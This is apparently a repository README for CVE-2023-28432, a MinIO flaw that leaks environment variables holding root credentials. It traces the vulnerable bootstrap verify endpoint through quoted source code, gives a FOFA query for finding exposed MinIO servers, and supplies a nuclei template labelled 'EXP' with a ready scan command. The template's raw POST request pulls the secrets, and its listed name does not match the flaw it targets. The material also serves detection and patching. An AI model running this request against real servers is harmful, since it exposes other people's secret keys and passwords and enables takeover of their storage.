CVE-2023-28432
CVE-2023-28432
CVE-2023-28432 nuclei templates
Dec
Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
vuln info
# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L197// Verify - fetches system server config.func (client *bootstrapRESTClient) Verify(ctx context.Context, srcCfg ServerSystemConfig) (err error) { if newObjectLayerFn() != nil { return nil } respBody, err := client.callWithContext(ctx, bootstrapRESTMethodVerify, nil, nil, -1) if err != nil { return } defer xhttp.DrainBody(respBody) recvCfg := ServerSystemConfig{} if err = json.NewDecoder(respBody).Decode(&recvCfg); err != nil { return err } return srcCfg.Diff(recvCfg) } # https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L54const ( bootstrapRESTVersion ? ? ? = "v1" bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion bootstrapRESTPrefix ? ? ? ?= minioReservedBucketPath + "/bootstrap" bootstrapRESTPath ? ? ? ? ?= bootstrapRESTPrefix + bootstrapRESTVersionPrefix)const ( bootstrapRESTMethodHealth = "/health" bootstrapRESTMethodVerify = "/verify")// To abstract a node over network.type bootstrapRESTServer struct{}// ServerSystemConfig - captures information about server configuration.type ServerSystemConfig struct { MinioEndpoints EndpointServerPools MinioEnv ? ? ? map[string]string} # https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L149func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) { ctx := newContext(r, w, "VerifyHandler") if err := storageServerRequestValidate(r); err != nil { b.writeErrorResponse(w, err) return } cfg := getServerSystemCfg() logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg)) }// registerBootstrapRESTHandlers - register bootstrap rest router.func registerBootstrapRESTHandlers(router *mux.Router) { server := &bootstrapRESTServer{} subrouter := router.PathPrefix(bootstrapRESTPrefix).Subrouter() subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodHealth).HandlerFunc( httpTraceHdrs(server.HealthHandler)) subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify).HandlerFunc( httpTraceHdrs(server.VerifyHandler)) } # https://github.com/minio/minio/blob/master/cmd/object-api-utils.go#L210// SlashSeparator - slash separator.const SlashSeparator = "/"https://github.com/minio/minio/blob/master/cmd/generic-handlers.go#L138const ( minioReservedBucket ? ? ? ? ? ? ?= "minio" minioReservedBucketPath ? ? ? ? ?= SlashSeparator + minioReservedBucket minioReservedBucketPathWithSlash = SlashSeparator + minioReservedBucket + SlashSeparatorSlashSeparator = "/"minioReservedBucketPath = SlashSeparator + minioReservedBucket ==> /miniobootstrapRESTPrefix ? ? ? ?= minioReservedBucketPath + "/bootstrap" ==> /minio/bootstrap/bootstrapRESTVersion ? ? ? = "v1"bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion ==> /v1bootstrapRESTMethodVerify = "/verify"subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify) ==> /v1/verify/final path:/minio/bootstrap/v1/verify/
fofa
app="minio"
EXP
id: CVE-2023-28432info: ?name: Minio post policy request security bypass ?author: Mr-xn ?severity: high ?description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. ?reference: ? ?- https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q ? ?- https://github.com/minio/minio/pull/16853/files ? ?- https://github.com/golang/vulndb/issues/1667 ? ?- https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json ?classification: ? ?cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N ? ?cvss-score: 7.5 ? ?cve-id: CVE-2023-28432 ? ?cwe-id: CWE-200 ?tags: cve,cve2023,requests: ?- raw: ? ? ?- |+ ? ? ? ?POST /minio/bootstrap/v1/verify HTTP/1.1 ? ? ? ?Host: {{Hostname}} ? ? ? ?Content-Type: application/x-www-form-urlencoded ? ?matchers-condition: and ? ?matchers: ? ? ?- type: word ? ? ? ?part: body ? ? ? ?words: ? ? ? ? ?- '"MinioEndpoints"' ? ? ?- type: word ? ? ? ?part: header ? ? ? ?words: ? ? ? ? ?- 'Content-Type: text/plain' ? ? ?- type: status ? ? ? ?status: ? ? ? ? ?- 200
nuclei
nuclei -v -t /path/to/CVE-2023-28432.yaml -u?http://target.com:port
reference:
https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
https://github.com/minio/minio/pull/16853/files
golang/vulndb#1667
https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
